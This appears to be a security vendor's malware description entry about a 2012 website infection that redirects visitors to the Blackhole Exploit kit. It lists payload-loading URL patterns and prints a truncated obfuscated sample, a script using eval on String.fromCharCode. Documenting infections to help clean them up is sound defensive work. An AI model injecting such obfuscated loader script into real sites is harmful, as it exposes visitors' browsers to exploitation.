Description:
An encoded javascript (or a redirection to it) was detected, leading browsers to the Blackhole Exploit kit (v1.x). It attempts to exploit the browser of anyone visiting the site using a combination of multiple vulnerabilities (Java, Adobe PDF, Flash and others). This is one of the most common type of malware we are seeing on web sites lately (2012/Jun).
Note that any PHP, JS or .htaccess could be compromised by this type of malware.
Affecting: Any web site. Often on outdated WordPress, Joomla and osCommerce sites.
Clean up: You can also sign up with us and let our team remove the malware for you.
Loads malware from multiple sources:
http://random/main.php?page=c22541c393fa212e
http://random/?go=2
http://random/runforestrun?sid=cx
(and many other domains).
Malware dump (sample of malware):
<script>/ *km0ae9gr6m */ window. eval ( String.fromCharCode (115, 61, 34, 34,..